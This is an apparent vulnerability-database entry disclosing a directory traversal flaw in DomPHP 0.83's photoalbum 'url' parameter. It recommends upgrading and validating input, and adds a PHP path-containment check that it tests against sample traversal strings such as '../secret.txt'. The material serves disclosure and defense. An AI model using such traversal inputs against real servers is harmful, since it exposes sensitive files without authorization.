Vendor: DomPHP
By: Houssamix
CVSS: 5.5 (MEDIUM)
Type: Local Directory Traversal
CWE: 22
Product Name: DomPHP
Affected Version From: 0.83
Affected Version To: 0.83
Patch Exists: YES
Related CWE:
CPE:
Platforms Tested:
DomPHP <= v0.83 Local Directory Traversal Vulnerability
The DomPHP script version 0.83 is vulnerable to a local directory traversal attack. An attacker can exploit this vulnerability by providing a crafted URL to the 'url' parameter in the 'index.php' script of the photoalbum module. By manipulating the 'url' parameter, an attacker can navigate to arbitrary directories on the server and access sensitive files.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of DomPHP (v0.84) or later. Additionally, it is recommended to implement access controls and input validation to prevent directory traversal attacks.
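The input validation recommended above can be implemented as a canonicalize-then-contain check on the 'url' parameter. The following is an added example, not DomPHP code or the vendor's patch; the function name `resolve_album_path()` and the directory layout are hypothetical, and the sample tree is constructed in the system temp directory.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a user-supplied relative path inside $root.
 * Returns the canonical absolute path, or null if the request must be rejected.
 */
function resolve_album_path(string $root, string $userPath): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null; // misconfigured root: fail closed
    }
    // realpath() collapses "..", "." and symlinks, and returns false
    // when the target does not exist.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null;
    }
    // Compare against the root plus a trailing separator so that a sibling
    // such as "albums_private" does not pass as being inside "albums".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $rootReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed sample tree (not DomPHP's real layout).
$base = sys_get_temp_dir() . '/domphp_example_' . bin2hex(random_bytes(4));
mkdir("$base/albums/holiday", 0700, true);
mkdir("$base/albums_private", 0700, true);
file_put_contents("$base/secret.txt", 'x');

// Values as they might arrive in the 'url' parameter.
$cases = ['holiday', 'holiday/../holiday', '../secret.txt',
          '../albums_private', 'holiday/../../secret.txt', 'missing'];
foreach ($cases as $c) {
    $r = resolve_album_path("$base/albums", $c);
    printf("%-28s => %s\n", $c, $r === null ? 'REJECTED' : 'ok');
}
```

Only the first two sample values resolve inside the album root; the rest are rejected, including the sibling directory that shares the root's name as a prefix.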